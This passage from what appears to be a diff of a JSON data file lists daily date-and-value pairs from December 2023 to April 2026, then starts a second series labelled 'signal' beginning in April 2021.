"2023-12-05", + 21.042184829711914 + ], + [ + "2023-12-06", + 20.667903900146484 + ], + [ + "2023-12-07", + 21.533119201660156 + ], + [ + "2023-12-08", + 21.790740966796875 + ], + [ + "2023-12-11", + 22.344867706298828 + ], + [ + "2023-12-12", + 22.88440704345703 + ], + [ + "2023-12-13", + 23.69129180908203 + ], + [ + "2023-12-14", + 23.65240478515625 + ], + [ + "2023-12-15", + 23.934329986572266 + ], + [ + "2023-12-18", + 24.434986114501953 + ], + [ + "2023-12-19", + 24.79953956604004 + ], + [ + "2023-12-20", + 23.697654724121094 + ], + [ + "2023-12-21", + 24.483671188354492 + ], + [ + "2023-12-22", + 24.581310272216797 + ], + [ + "2023-12-26", + 25.03046417236328 + ], + [ + "2023-12-27", + 25.162281036376953 + ], + [ + "2023-12-28", + 25.09881591796875 + ], + [ + "2023-12-29", + 24.752185821533203 + ], + [ + "2024-01-02", + 23.49748992919922 + ], + [ + "2024-01-03", + 22.74564552307129 + ], + [ + "2024-01-04", + 22.364845275878906 + ], + [ + "2024-01-05", + 22.44783592224121 + ], + [ + "2024-01-08", + 23.8001766204834 + ], + [ + "2024-01-09", + 23.956403732299805 + ], + [ + "2024-01-10", + 24.429969787597656 + ], + [ + "2024-01-11", + 24.547138214111328 + ], + [ + "2024-01-12", + 24.576427459716797 + ], + [ + "2024-01-16", + 24.561784744262695 + ], + [ + "2024-01-17", + 24.137041091918945 + ], + [ + "2024-01-18", + 25.172046661376953 + ], + [ + "2024-01-19", + 26.626907348632812 + ], + [ + "2024-01-22", + 26.734312057495117 + ], + [ + "2024-01-23", + 27.05164909362793 + ], + [ + "2024-01-24", + 27.49591827392578 + ], + [ + "2024-01-25", + 27.574031829833984 + ], + [ + "2024-01-26", + 27.06629180908203 + ], + [ + "2024-01-29", + 27.862075805664062 + ], + [ + "2024-01-30", + 27.305519104003906 + ], + [ + "2024-01-31", + 25.699310302734375 + ], + [ + "2024-02-01", + 26.607379913330078 + ], + [ + "2024-02-02", + 27.945070266723633 + ], + [ + "2024-02-05", + 27.803491592407227 + ], + [ + "2024-02-06", + 27.642377853393555 + ], + [ + "2024-02-07", + 28.467453002929688 + ], + [ + "2024-02-08", + 28.58462142944336 + ], + [ + "2024-02-09", + 29.424341201782227 + ], + [ + "2024-02-12", + 29.077713012695312 + ], + [ + "2024-02-13", + 27.700965881347656 + ], + [ + "2024-02-14", + 28.579742431640625 + ], + [ + "2024-02-15", + 28.81896209716797 + ], + [ + "2024-02-16", + 28.028066635131836 + ], + [ + "2024-02-20", + 27.378751754760742 + ], + [ + "2024-02-21", + 27.037002563476562 + ], + [ + "2024-02-22", + 29.375518798828125 + ], + [ + "2024-02-23", + 29.10700798034668 + ], + [ + "2024-02-26", + 29.067949295043945 + ], + [ + "2024-02-27", + 29.24858856201172 + ], + [ + "2024-02-28", + 28.7750244140625 + ], + [ + "2024-02-29", + 29.468284606933594 + ], + [ + "2024-03-01", + 30.820619583129883 + ], + [ + "2024-03-04", + 30.4544620513916 + ], + [ + "2024-03-05", + 28.823848724365234 + ], + [ + "2024-03-06", + 29.355995178222656 + ], + [ + "2024-03-07", + 30.664392471313477 + ], + [ + "2024-03-08", + 29.32181739807129 + ], + [ + "2024-03-11", + 28.980073928833008 + ], + [ + "2024-03-12", + 30.210359573364258 + ], + [ + "2024-03-13", + 29.50733757019043 + ], + [ + "2024-03-14", + 29.268115997314453 + ], + [ + "2024-03-15", + 28.198936462402344 + ], + [ + "2024-03-18", + 28.99471664428711 + ], + [ + "2024-03-19", + 29.19488525390625 + ], + [ + "2024-03-20", + 30.231168746948242 + ], + [ + "2024-03-21", + 30.623149871826172 + ], + [ + "2024-03-22", + 30.686845779418945 + ], + [ + "2024-03-25", + 30.373262405395508 + ], + [ + "2024-03-26", + 30.089078903198242 + ], + [ + "2024-03-27", + 30.35366439819336 + ], + [ + "2024-03-28", + 30.162574768066406 + ], + [ + "2024-04-01", + 30.34876251220703 + ], + [ + "2024-04-02", + 29.53541374206543 + ], + [ + "2024-04-03", + 29.731403350830078 + ], + [ + "2024-04-04", + 28.330087661743164 + ], + [ + "2024-04-05", + 29.329626083374023 + ], + [ + "2024-04-08", + 29.349224090576172 + ], + [ + "2024-04-09", + 29.653005599975586 + ], + [ + "2024-04-10", + 28.87395477294922 + ], + [ + "2024-04-11", + 30.231168746948242 + ], + [ + "2024-04-12", + 28.77106285095215 + ], + [ + "2024-04-15", + 27.325647354125977 + ], + [ + "2024-04-16", + 27.330547332763672 + ], + [ + "2024-04-17", + 26.316307067871094 + ], + [ + "2024-04-18", + 25.845935821533203 + ], + [ + "2024-04-19", + 24.24373435974121 + ], + [ + "2024-04-22", + 24.949289321899414 + ], + [ + "2024-04-23", + 26.061521530151367 + ], + [ + "2024-04-24", + 26.316307067871094 + ], + [ + "2024-04-25", + 25.894933700561523 + ], + [ + "2024-04-26", + 27.08555793762207 + ], + [ + "2024-04-29", + 27.408939361572266 + ], + [ + "2024-04-30", + 25.84103775024414 + ], + [ + "2024-05-01", + 25.282470703125 + ], + [ + "2024-05-02", + 26.218311309814453 + ], + [ + "2024-05-03", + 27.781320571899414 + ], + [ + "2024-05-06", + 28.692665100097656 + ], + [ + "2024-05-07", + 28.692665100097656 + ], + [ + "2024-05-08", + 28.638769149780273 + ], + [ + "2024-05-09", + 28.795560836791992 + ], + [ + "2024-05-10", + 28.991544723510742 + ], + [ + "2024-05-13", + 29.182634353637695 + ], + [ + "2024-05-14", + 29.726499557495117 + ], + [ + "2024-05-15", + 31.098419189453125 + ], + [ + "2024-05-16", + 30.907331466674805 + ], + [ + "2024-05-17", + 30.838733673095703 + ], + [ + "2024-05-20", + 31.47569465637207 + ], + [ + "2024-05-21", + 31.637386322021484 + ], + [ + "2024-05-22", + 31.61779022216797 + ], + [ + "2024-05-23", + 31.14741325378418 + ], + [ + "2024-05-24", + 32.019561767578125 + ], + [ + "2024-05-28", + 32.3674430847168 + ], + [ + "2024-05-29", + 31.691280364990234 + ], + [ + "2024-05-30", + 30.672142028808594 + ], + [ + "2024-05-31", + 30.637845993041992 + ], + [ + "2024-06-03", + 30.936729431152344 + ], + [ + "2024-06-04", + 31.167016983032227 + ], + [ + "2024-06-05", + 33.04849624633789 + ], + [ + "2024-06-06", + 33.009307861328125 + ], + [ + "2024-06-07", + 32.88681411743164 + ], + [ + "2024-06-10", + 33.23469161987305 + ], + [ + "2024-06-11", + 33.92064666748047 + ], + [ + "2024-06-12", + 35.25826644897461 + ], + [ + "2024-06-13", + 35.82173156738281 + ], + [ + "2024-06-14", + 36.34109878540039 + ], + [ + "2024-06-17", + 37.65911865234375 + ], + [ + "2024-06-18", + 37.6787223815918 + ], + [ + "2024-06-20", + 36.7918701171875 + ], + [ + "2024-06-21", + 36.453800201416016 + ], + [ + "2024-06-24", + 35.21906280517578 + ], + [ + "2024-06-25", + 36.394996643066406 + ], + [ + "2024-06-26", + 36.62271499633789 + ], + [ + "2024-06-27", + 36.88832092285156 + ], + [ + "2024-06-28", + 36.30793762207031 + ], + [ + "2024-07-01", + 36.903076171875 + ], + [ + "2024-07-02", + 38.03432083129883 + ], + [ + "2024-07-03", + 38.968814849853516 + ], + [ + "2024-07-05", + 40.14924621582031 + ], + [ + "2024-07-08", + 40.41484069824219 + ], + [ + "2024-07-09", + 40.50337219238281 + ], + [ + "2024-07-10", + 41.77233123779297 + ], + [ + "2024-07-11", + 39.0278434753418 + ], + [ + "2024-07-12", + 39.66231918334961 + ], + [ + "2024-07-15", + 39.957427978515625 + ], + [ + "2024-07-16", + 39.9869384765625 + ], + [ + "2024-07-17", + 36.47025680541992 + ], + [ + "2024-07-18", + 35.9243049621582 + ], + [ + "2024-07-19", + 34.95044708251953 + ], + [ + "2024-07-22", + 36.47517013549805 + ], + [ + "2024-07-23", + 36.081687927246094 + ], + [ + "2024-07-24", + 32.19120407104492 + ], + [ + "2024-07-25", + 31.118986129760742 + ], + [ + "2024-07-26", + 32.00922775268555 + ], + [ + "2024-07-29", + 32.19612503051758 + ], + [ + "2024-07-30", + 30.882902145385742 + ], + [ + "2024-07-31", + 33.5831298828125 + ], + [ + "2024-08-01", + 31.163251876831055 + ], + [ + "2024-08-02", + 28.89093017578125 + ], + [ + "2024-08-05", + 26.3726863861084 + ], + [ + "2024-08-06", + 27.03175926208496 + ], + [ + "2024-08-07", + 26.161195755004883 + ], + [ + "2024-08-08", + 28.55647850036621 + ], + [ + "2024-08-09", + 28.94503402709961 + ], + [ + "2024-08-12", + 29.141769409179688 + ], + [ + "2024-08-13", + 31.261621475219727 + ], + [ + "2024-08-14", + 31.31572151184082 + ], + [ + "2024-08-15", + 33.671661376953125 + ], + [ + "2024-08-16", + 33.760189056396484 + ], + [ + "2024-08-19", + 35.06849670410156 + ], + [ + "2024-08-20", + 34.852081298828125 + ], + [ + "2024-08-21", + 35.32917022705078 + ], + [ + "2024-08-22", + 33.63230895996094 + ], + [ + "2024-08-23", + 34.68977355957031 + ], + [ + "2024-08-26", + 33.671661376953125 + ], + [ + "2024-08-27", + 33.95692443847656 + ], + [ + "2024-08-28", + 32.80600357055664 + ], + [ + "2024-08-29", + 32.63386535644531 + ], + [ + "2024-08-30", + 33.74543380737305 + ], + [ + "2024-09-03", + 30.666486740112305 + ], + [ + "2024-09-04", + 30.405811309814453 + ], + [ + "2024-09-05", + 30.504179000854492 + ], + [ + "2024-09-06", + 28.030202865600586 + ], + [ + "2024-09-09", + 29.072914123535156 + ], + [ + "2024-09-10", + 29.85494613647461 + ], + [ + "2024-09-11", + 31.758384704589844 + ], + [ + "2024-09-12", + 32.697811126708984 + ], + [ + "2024-09-13", + 33.125709533691406 + ], + [ + "2024-09-16", + 32.683048248291016 + ], + [ + "2024-09-17", + 32.702728271484375 + ], + [ + "2024-09-18", + 32.27482223510742 + ], + [ + "2024-09-19", + 34.7143669128418 + ], + [ + "2024-09-20", + 34.49303436279297 + ], + [ + "2024-09-23", + 34.74879837036133 + ], + [ + "2024-09-24", + 35.240638732910156 + ], + [ + "2024-09-25", + 35.36399841308594 + ], + [ + "2024-09-26", + 36.11400604248047 + ], + [ + "2024-09-27", + 35.49229049682617 + ], + [ + "2024-09-30", + 35.76860809326172 + ], + [ + "2024-10-01", + 34.2537841796875 + ], + [ + "2024-10-02", + 34.382076263427734 + ], + [ + "2024-10-03", + 34.303123474121094 + ], + [ + "2024-10-04", + 35.51203155517578 + ], + [ + "2024-10-07", + 34.34260177612305 + ], + [ + "2024-10-08", + 35.832759857177734 + ], + [ + "2024-10-09", + 36.69625473022461 + ], + [ + "2024-10-10", + 36.567962646484375 + ], + [ + "2024-10-11", + 36.66171646118164 + ], + [ + "2024-10-14", + 37.59922790527344 + ], + [ + "2024-10-15", + 36.09920883178711 + ], + [ + "2024-10-16", + 36.0794677734375 + ], + [ + "2024-10-17", + 36.188018798828125 + ], + [ + "2024-10-18", + 36.82948303222656 + ], + [ + "2024-10-21", + 37.03178787231445 + ], + [ + "2024-10-22", + 37.140342712402344 + ], + [ + "2024-10-23", + 35.423213958740234 + ], + [ + "2024-10-24", + 36.26697540283203 + ], + [ + "2024-10-25", + 36.878822326660156 + ], + [ + "2024-10-28", + 36.91336441040039 + ], + [ + "2024-10-29", + 37.934757232666016 + ], + [ + "2024-10-30", + 37.09099578857422 + ], + [ + "2024-10-31", + 34.26858139038086 + ], + [ + "2024-11-01", + 34.99885559082031 + ], + [ + "2024-11-04", + 34.67319869995117 + ], + [ + "2024-11-05", + 35.99065017700195 + ], + [ + "2024-11-06", + 38.91175079345703 + ], + [ + "2024-11-07", + 40.73249435424805 + ], + [ + "2024-11-08", + 40.831180572509766 + ], + [ + "2024-11-11", + 40.757164001464844 + ], + [ + "2024-11-12", + 40.535125732421875 + ], + [ + "2024-11-13", + 40.35749435424805 + ], + [ + "2024-11-14", + 39.50386047363281 + ], + [ + "2024-11-15", + 36.64691162109375 + ], + [ + "2024-11-18", + 37.38705062866211 + ], + [ + "2024-11-19", + 38.13706588745117 + ], + [ + "2024-11-20", + 38.092655181884766 + ], + [ + "2024-11-21", + 38.46765899658203 + ], + [ + "2024-11-22", + 38.61075210571289 + ], + [ + "2024-11-25", + 38.78839111328125 + ], + [ + "2024-11-26", + 39.390377044677734 + ], + [ + "2024-11-27", + 38.438053131103516 + ], + [ + "2024-11-29", + 39.41997528076172 + ], + [ + "2024-12-02", + 40.697959899902344 + ], + [ + "2024-12-03", + 41.05815505981445 + ], + [ + "2024-12-04", + 42.55818176269531 + ], + [ + "2024-12-05", + 42.20785140991211 + ], + [ + "2024-12-06", + 43.29338836669922 + ], + [ + "2024-12-09", + 42.2818603515625 + ], + [ + "2024-12-10", + 41.82297134399414 + ], + [ + "2024-12-11", + 44.05820083618164 + ], + [ + "2024-12-12", + 43.18483352661133 + ], + [ + "2024-12-13", + 44.11248016357422 + ], + [ + "2024-12-16", + 46.03191375732422 + ], + [ + "2024-12-17", + 45.415130615234375 + ], + [ + "2024-12-18", + 40.505516052246094 + ], + [ + "2024-12-19", + 39.93314743041992 + ], + [ + "2024-12-20", + 40.969337463378906 + ], + [ + "2024-12-23", + 42.110469818115234 + ], + [ + "2024-12-24", + 43.7838020324707 + ], + [ + "2024-12-26", + 43.689735412597656 + ], + [ + "2024-12-27", + 41.912452697753906 + ], + [ + "2024-12-30", + 40.229217529296875 + ], + [ + "2024-12-31", + 39.17471694946289 + ], + [ + "2025-01-02", + 38.92718505859375 + ], + [ + "2025-01-03", + 40.79359436035156 + ], + [ + "2025-01-06", + 42.18473815917969 + ], + [ + "2025-01-07", + 39.912376403808594 + ], + [ + "2025-01-08", + 39.942081451416016 + ], + [ + "2025-01-10", + 38.03606414794922 + ], + [ + "2025-01-13", + 37.640010833740234 + ], + [ + "2025-01-14", + 37.506343841552734 + ], + [ + "2025-01-15", + 40.04108810424805 + ], + [ + "2025-01-16", + 39.22422409057617 + ], + [ + "2025-01-17", + 41.159942626953125 + ], + [ + "2025-01-21", + 41.843135833740234 + ], + [ + "2025-01-22", + 43.466957092285156 + ], + [ + "2025-01-23", + 43.73429870605469 + ], + [ + "2025-01-24", + 42.9471435546875 + ], + [ + "2025-01-27", + 39.1796760559082 + ], + [ + "2025-01-28", + 40.917362213134766 + ], + [ + "2025-01-29", + 40.66487503051758 + ], + [ + "2025-01-30", + 41.1747932434082 + ], + [ + "2025-01-31", + 40.95201110839844 + ], + [ + "2025-02-03", + 39.96187973022461 + ], + [ + "2025-02-04", + 41.41242599487305 + ], + [ + "2025-02-05", + 41.952049255371094 + ], + [ + "2025-02-06", + 42.580787658691406 + ], + [ + "2025-02-07", + 40.95696258544922 + ], + [ + "2025-02-10", + 42.39760971069336 + ], + [ + "2025-02-11", + 42.09562301635742 + ], + [ + "2025-02-12", + 42.17978286743164 + ], + [ + "2025-02-13", + 43.95707702636719 + ], + [ + "2025-02-14", + 44.471946716308594 + ], + [ + "2025-02-18", + 44.749183654785156 + ], + [ + "2025-02-19", + 44.7541389465332 + ], + [ + "2025-02-20", + 44.20956039428711 + ], + [ + "2025-02-21", + 41.44213104248047 + ], + [ + "2025-02-24", + 39.95197677612305 + ], + [ + "2025-02-25", + 38.42716979980469 + ], + [ + "2025-02-26", + 38.67470932006836 + ], + [ + "2025-02-27", + 35.4666633605957 + ], + [ + "2025-02-28", + 37.09048080444336 + ], + [ + "2025-03-03", + 34.694358825683594 + ], + [ + "2025-03-04", + 34.31315231323242 + ], + [ + "2025-03-05", + 35.649837493896484 + ], + [ + "2025-03-06", + 32.69428253173828 + ], + [ + "2025-03-07", + 33.37253189086914 + ], + [ + "2025-03-10", + 29.61001205444336 + ], + [ + "2025-03-11", + 29.26346206665039 + ], + [ + "2025-03-12", + 30.26350212097168 + ], + [ + "2025-03-13", + 28.609973907470703 + ], + [ + "2025-03-14", + 30.63974952697754 + ], + [ + "2025-03-17", + 31.23383331298828 + ], + [ + "2025-03-18", + 29.659517288208008 + ], + [ + "2025-03-19", + 30.813026428222656 + ], + [ + "2025-03-20", + 30.496177673339844 + ], + [ + "2025-03-21", + 30.7833194732666 + ], + [ + "2025-03-24", + 32.73883819580078 + ], + [ + "2025-03-25", + 33.32301330566406 + ], + [ + "2025-03-26", + 31.469974517822266 + ], + [ + "2025-03-27", + 30.93372344970703 + ], + [ + "2025-03-28", + 28.4709415435791 + ], + [ + "2025-03-31", + 28.451080322265625 + ], + [ + "2025-04-01", + 29.10649871826172 + ], + [ + "2025-04-02", + 29.7569522857666 + ], + [ + "2025-04-03", + 24.97538185119629 + ], + [ + "2025-04-04", + 20.402353286743164 + ], + [ + "2025-04-07", + 20.481800079345703 + ], + [ + "2025-04-08", + 19.314958572387695 + ], + [ + "2025-04-09", + 26.122364044189453 + ], + [ + "2025-04-10", + 22.90982437133789 + ], + [ + "2025-04-11", + 24.12135124206543 + ], + [ + "2025-04-14", + 24.627811431884766 + ], + [ + "2025-04-15", + 24.722152709960938 + ], + [ + "2025-04-16", + 22.487775802612305 + ], + [ + "2025-04-17", + 22.423227310180664 + ], + [ + "2025-04-21", + 20.784683227539062 + ], + [ + "2025-04-22", + 22.373573303222656 + ], + [ + "2025-04-23", + 23.858192443847656 + ], + [ + "2025-04-24", + 25.888996124267578 + ], + [ + "2025-04-25", + 26.743022918701172 + ], + [ + "2025-04-28", + 26.723159790039062 + ], + [ + "2025-04-29", + 27.244518280029297 + ], + [ + "2025-04-30", + 27.249483108520508 + ], + [ + "2025-05-01", + 28.18791961669922 + ], + [ + "2025-05-02", + 29.508686065673828 + ], + [ + "2025-05-05", + 28.997264862060547 + ], + [ + "2025-05-06", + 28.17302703857422 + ], + [ + "2025-05-07", + 28.500736236572266 + ], + [ + "2025-05-08", + 29.34979820251465 + ], + [ + "2025-05-09", + 29.280282974243164 + ], + [ + "2025-05-12", + 32.825496673583984 + ], + [ + "2025-05-13", + 34.329978942871094 + ], + [ + "2025-05-14", + 34.93574523925781 + ], + [ + "2025-05-15", + 35.04498291015625 + ], + [ + "2025-05-16", + 35.476959228515625 + ], + [ + "2025-05-19", + 35.5713005065918 + ], + [ + "2025-05-20", + 35.19890594482422 + ], + [ + "2025-05-21", + 33.7341423034668 + ], + [ + "2025-05-22", + 33.90793228149414 + ], + [ + "2025-05-23", + 32.929771423339844 + ], + [ + "2025-05-27", + 35.22372817993164 + ], + [ + "2025-05-28", + 34.771888732910156 + ], + [ + "2025-05-29", + 34.94070816040039 + ], + [ + "2025-05-30", + 34.75699234008789 + ], + [ + "2025-06-02", + 35.55640411376953 + ], + [ + "2025-06-03", + 36.3856086730957 + ], + [ + "2025-06-04", + 36.678558349609375 + ], + [ + "2025-06-05", + 35.824527740478516 + ], + [ + "2025-06-06", + 36.84737777709961 + ], + [ + "2025-06-09", + 37.01123046875 + ], + [ + "2025-06-10", + 37.726234436035156 + ], + [ + "2025-06-11", + 37.33893966674805 + ], + [ + "2025-06-12", + 37.58224105834961 + ], + [ + "2025-06-13", + 36.16217041015625 + ], + [ + "2025-06-16", + 37.63685989379883 + ], + [ + "2025-06-17", + 36.52463150024414 + ], + [ + "2025-06-18", + 36.474979400634766 + ], + [ + "2025-06-20", + 35.97348403930664 + ], + [ + "2025-06-23", + 37.090675354003906 + ], + [ + "2025-06-24", + 38.778873443603516 + ], + [ + "2025-06-25", + 39.076629638671875 + ], + [ + "2025-06-26", + 40.147151947021484 + ], + [ + "2025-06-27", + 40.54050827026367 + ], + [ + "2025-06-30", + 41.32721710205078 + ], + [ + "2025-07-01", + 40.276611328125 + ], + [ + "2025-07-02", + 41.0782585144043 + ], + [ + "2025-07-03", + 42.228450775146484 + ], + [ + "2025-07-07", + 41.287384033203125 + ], + [ + "2025-07-08", + 41.34215545654297 + ], + [ + "2025-07-09", + 42.19857406616211 + ], + [ + "2025-07-10", + 42.004390716552734 + ], + [ + "2025-07-11", + 41.68572235107422 + ], + [ + "2025-07-14", + 42.128868103027344 + ], + [ + "2025-07-15", + 42.23841094970703 + ], + [ + "2025-07-16", + 42.35791015625 + ], + [ + "2025-07-17", + 43.34379196166992 + ], + [ + "2025-07-18", + 43.19441604614258 + ], + [ + "2025-07-21", + 43.85166549682617 + ], + [ + "2025-07-22", + 43.16951370239258 + ], + [ + "2025-07-23", + 43.737144470214844 + ], + [ + "2025-07-24", + 44.02593231201172 + ], + [ + "2025-07-25", + 44.27489471435547 + ], + [ + "2025-07-28", + 44.70808410644531 + ], + [ + "2025-07-29", + 44.50393295288086 + ], + [ + "2025-07-30", + 44.658294677734375 + ], + [ + "2025-07-31", + 43.92137145996094 + ], + [ + "2025-08-01", + 41.287384033203125 + ], + [ + "2025-08-04", + 43.547935485839844 + ], + [ + "2025-08-05", + 42.6417236328125 + ], + [ + "2025-08-06", + 44.23505783081055 + ], + [ + "2025-08-07", + 44.68318557739258 + ], + [ + "2025-08-08", + 45.88814926147461 + ], + [ + "2025-08-11", + 45.48483657836914 + ], + [ + "2025-08-12", + 47.16282272338867 + ], + [ + "2025-08-13", + 47.2325325012207 + ], + [ + "2025-08-14", + 47.10306930541992 + ], + [ + "2025-08-15", + 46.43585968017578 + ], + [ + "2025-08-18", + 46.3761100769043 + ], + [ + "2025-08-19", + 44.48401641845703 + ], + [ + "2025-08-20", + 43.67241668701172 + ], + [ + "2025-08-21", + 43.0649528503418 + ], + [ + "2025-08-22", + 45.001853942871094 + ], + [ + "2025-08-25", + 44.608497619628906 + ], + [ + "2025-08-26", + 45.1263313293457 + ], + [ + "2025-08-27", + 45.33047866821289 + ], + [ + "2025-08-28", + 46.15702438354492 + ], + [ + "2025-08-29", + 44.493980407714844 + ], + [ + "2025-09-02", + 43.358726501464844 + ], + [ + "2025-09-03", + 44.36949920654297 + ], + [ + "2025-09-04", + 45.569480895996094 + ], + [ + "2025-09-05", + 45.7188606262207 + ], + [ + "2025-09-08", + 46.37112808227539 + ], + [ + "2025-09-09", + 46.749549865722656 + ], + [ + "2025-09-10", + 46.799339294433594 + ], + [ + "2025-09-11", + 47.58605194091797 + ], + [ + "2025-09-12", + 48.1785774230957 + ], + [ + "2025-09-15", + 49.40843200683594 + ], + [ + "2025-09-16", + 49.27399444580078 + ], + [ + "2025-09-17", + 48.96030807495117 + ], + [ + "2025-09-18", + 50.27979278564453 + ], + [ + "2025-09-19", + 51.27562713623047 + ], + [ + "2025-09-22", + 52.142005920410156 + ], + [ + "2025-09-23", + 51.09139633178711 + ], + [ + "2025-09-24", + 50.54216766357422 + ], + [ + "2025-09-25", + 49.864349365234375 + ], + [ + "2025-09-26", + 50.46242141723633 + ], + [ + "2025-09-29", + 51.13525390625 + ], + [ + "2025-09-30", + 51.53396987915039 + ], + [ + "2025-10-01", + 52.26162338256836 + ], + [ + "2025-10-02", + 52.899566650390625 + ], + [ + "2025-10-03", + 52.181880950927734 + ], + [ + "2025-10-06", + 53.34812545776367 + ], + [ + "2025-10-07", + 52.48590087890625 + ], + [ + "2025-10-08", + 54.26517105102539 + ], + [ + "2025-10-09", + 54.05086135864258 + ], + [ + "2025-10-10", + 48.37913513183594 + ], + [ + "2025-10-13", + 51.44924545288086 + ], + [ + "2025-10-14", + 50.402610778808594 + ], + [ + "2025-10-15", + 51.43429183959961 + ], + [ + "2025-10-16", + 50.86113739013672 + ], + [ + "2025-10-17", + 51.82802200317383 + ], + [ + "2025-10-20", + 53.771759033203125 + ], + [ + "2025-10-21", + 53.711952209472656 + ], + [ + "2025-10-22", + 52.132041931152344 + ], + [ + "2025-10-23", + 53.437835693359375 + ], + [ + "2025-10-24", + 55.10247039794922 + ], + [ + "2025-10-27", + 58.028045654296875 + ], + [ + "2025-10-28", + 59.35377502441406 + ], + [ + "2025-10-29", + 60.11133575439453 + ], + [ + "2025-10-30", + 57.36019515991211 + ], + [ + "2025-10-31", + 58.17258071899414 + ], + [ + "2025-11-03", + 58.97001266479492 + ], + [ + "2025-11-04", + 55.36164093017578 + ], + [ + "2025-11-05", + 56.438167572021484 + ], + [ + "2025-11-06", + 53.27336502075195 + ], + [ + "2025-11-07", + 52.72014617919922 + ], + [ + "2025-11-10", + 56.17401885986328 + ], + [ + "2025-11-11", + 55.710514068603516 + ], + [ + "2025-11-12", + 55.59588623046875 + ], + [ + "2025-11-13", + 52.161949157714844 + ], + [ + "2025-11-14", + 52.20181655883789 + ], + [ + "2025-11-17", + 50.86113739013672 + ], + [ + "2025-11-18", + 49.022064208984375 + ], + [ + "2025-11-19", + 49.864349365234375 + ], + [ + "2025-11-20", + 46.30083084106445 + ], + [ + "2025-11-21", + 47.327518463134766 + ], + [ + "2025-11-24", + 50.91596603393555 + ], + [ + "2025-11-25", + 51.84297180175781 + ], + [ + "2025-11-26", + 53.1986083984375 + ], + [ + "2025-11-28", + 54.36484909057617 + ], + [ + "2025-12-01", + 53.87641906738281 + ], + [ + "2025-12-02", + 55.12240982055664 + ], + [ + "2025-12-03", + 55.51115417480469 + ], + [ + "2025-12-04", + 55.33173370361328 + ], + [ + "2025-12-05", + 55.96968078613281 + ], + [ + "2025-12-08", + 55.62080001831055 + ], + [ + "2025-12-09", + 55.83012390136719 + ], + [ + "2025-12-10", + 56.468074798583984 + ], + [ + "2025-12-11", + 55.9298095703125 + ], + [ + "2025-12-12", + 52.65037536621094 + ], + [ + "2025-12-15", + 51.852943420410156 + ], + [ + "2025-12-16", + 52.161949157714844 + ], + [ + "2025-12-17", + 49.241355895996094 + ], + [ + "2025-12-18", + 51.34457778930664 + ], + [ + "2025-12-19", + 53.34812545776367 + ], + [ + "2025-12-22", + 54.075782775878906 + ], + [ + "2025-12-23", + 54.83333969116211 + ], + [ + "2025-12-24", + 55.26862335205078 + ], + [ + "2025-12-26", + 55.21870422363281 + ], + [ + "2025-12-29", + 54.40005874633789 + ], + [ + "2025-12-30", + 54.01070022583008 + ], + [ + "2025-12-31", + 52.63298034667969 + ], + [ + "2026-01-02", + 52.263587951660156 + ], + [ + "2026-01-05", + 53.51152420043945 + ], + [ + "2026-01-06", + 54.91919708251953 + ], + [ + "2026-01-07", + 55.07893371582031 + ], + [ + "2026-01-08", + 54.10055160522461 + ], + [ + "2026-01-09", + 55.6679573059082 + ], + [ + "2026-01-12", + 55.79774475097656 + ], + [ + "2026-01-13", + 55.50822448730469 + ], + [ + "2026-01-14", + 53.74114990234375 + ], + [ + "2026-01-15", + 54.29024124145508 + ], + [ + "2026-01-16", + 54.05063247680664 + ], + [ + "2026-01-20", + 50.646263122558594 + ], + [ + "2026-01-21", + 52.64296340942383 + ], + [ + "2026-01-22", + 53.811031341552734 + ], + [ + "2026-01-23", + 54.29024124145508 + ], + [ + "2026-01-26", + 54.98908615112305 + ], + [ + "2026-01-27", + 56.44667434692383 + ], + [ + "2026-01-28", + 56.965816497802734 + ], + [ + "2026-01-29", + 55.9474983215332 + ], + [ + "2026-01-30", + 53.910865783691406 + ], + [ + "2026-02-02", + 55.00904846191406 + ], + [ + "2026-02-03", + 52.43330764770508 + ], + [ + "2026-02-04", + 49.67786407470703 + ], + [ + "2026-02-05", + 47.561363220214844 + ], + [ + "2026-02-06", + 50.50649642944336 + ], + [ + "2026-02-09", + 51.654598236083984 + ], + [ + "2026-02-10", + 50.93578338623047 + ], + [ + "2026-02-11", + 51.31515884399414 + ], + [ + "2026-02-12", + 48.18033981323242 + ], + [ + "2026-02-13", + 48.38999557495117 + ], + [ + "2026-02-17", + 48.27019119262695 + ], + [ + "2026-02-18", + 49.308475494384766 + ], + [ + "2026-02-19", + 48.7494010925293 + ], + [ + "2026-02-20", + 49.97737121582031 + ], + [ + "2026-02-23", + 48.16037368774414 + ], + [ + "2026-02-24", + 49.69783020019531 + ], + [ + "2026-02-25", + 51.78438186645508 + ], + [ + "2026-02-26", + 49.967384338378906 + ], + [ + "2026-02-27", + 49.438262939453125 + ], + [ + "2026-03-02", + 49.61796569824219 + ], + [ + "2026-03-03", + 48.02060317993164 + ], + [ + "2026-03-04", + 50.17703628540039 + ], + [ + "2026-03-05", + 49.717796325683594 + ], + [ + "2026-03-06", + 47.46152877807617 + ], + [ + "2026-03-09", + 49.308475494384766 + ], + [ + "2026-03-10", + 49.318458557128906 + ], + [ + "2026-03-11", + 49.26853942871094 + ], + [ + "2026-03-12", + 46.75270462036133 + ], + [ + "2026-03-13", + 45.85418701171875 + ], + [ + "2026-03-16", + 47.38166046142578 + ], + [ + "2026-03-17", + 48.08050537109375 + ], + [ + "2026-03-18", + 46.023902893066406 + ], + [ + "2026-03-19", + 45.61458206176758 + ], + [ + "2026-03-20", + 43.00889205932617 + ], + [ + "2026-03-23", + 44.496429443359375 + ], + [ + "2026-03-24", + 43.547996520996094 + ], + [ + "2026-03-25", + 44.38999938964844 + ], + [ + "2026-03-26", + 41.22999954223633 + ], + [ + "2026-03-27", + 38.779998779296875 + ], + [ + "2026-03-30", + 37.88999938964844 + ], + [ + "2026-03-31", + 41.68000030517578 + ], + [ + "2026-04-01", + 43.22999954223633 + ], + [ + "2026-04-02", + 43.33000183105469 + ], + [ + "2026-04-06", + 44.099998474121094 + ], + [ + "2026-04-07", + 44.150001525878906 + ], + [ + "2026-04-08", + 48.0 + ], + [ + "2026-04-09", + 48.959999084472656 + ], + [ + "2026-04-10", + 49.16999816894531 + ], + [ + "2026-04-13", + 50.65999984741211 + ], + [ + "2026-04-14", + 53.40999984741211 + ], + [ + "2026-04-15", + 55.650001525878906 + ], + [ + "2026-04-16", + 56.43000030517578 + ], + [ + "2026-04-17", + 58.59000015258789 + ], + [ + "2026-04-20", + 58.08000183105469 + ], + [ + "2026-04-21", + 57.400001525878906 + ], + [ + "2026-04-22", + 60.209999084472656 + ], + [ + "2026-04-23", + 59.220001220703125 + ] + ], + "signal": [ + [ + "2021-04-01", + 314.97247314453125 + ], + [ + "2021-04-05", + 321.2608337402344 + ], + [ + "2021-04-06", + 321.0376892089844 + ], + [ 